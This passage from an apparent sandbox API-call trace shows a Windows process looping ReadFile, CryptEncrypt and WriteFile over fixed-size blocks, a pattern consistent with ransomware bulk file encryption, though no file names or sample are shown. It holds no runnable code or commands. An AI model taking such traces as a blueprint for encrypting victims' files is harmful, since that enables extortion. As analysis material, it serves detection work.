lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.074] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.074] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.074] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.074] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.074] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.074] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.074] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.074] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.074] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.074] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.074] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.074] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.075] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.075] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.075] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.075] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.075] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.075] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.075] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.075] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.075] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.075] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.075] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.075] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.075] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.075] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.076] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.076] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.076] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.076] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.076] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.076] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.076] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.076] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.076] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.076] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.076] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.076] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.076] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.076] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.077] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.077] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.077] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.077] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.077] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.077] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.077] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.077] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.077] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.077] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.077] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.077] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.078] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.078] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.078] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.078] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.079] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.079] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.079] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.079] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.079] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.079] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.079] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.079] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.079] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.080] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.080] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.080] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.080] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.080] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.080] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.080] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.080] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.080] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.080] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.080] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.080] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.080] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.081] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.081] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.081] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.081] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.081] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.081] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.081] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.081] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.082] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.082] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.082] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.082] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.082] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.082] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.082] CryptEncrypt (in: hKey=0x2fa548, 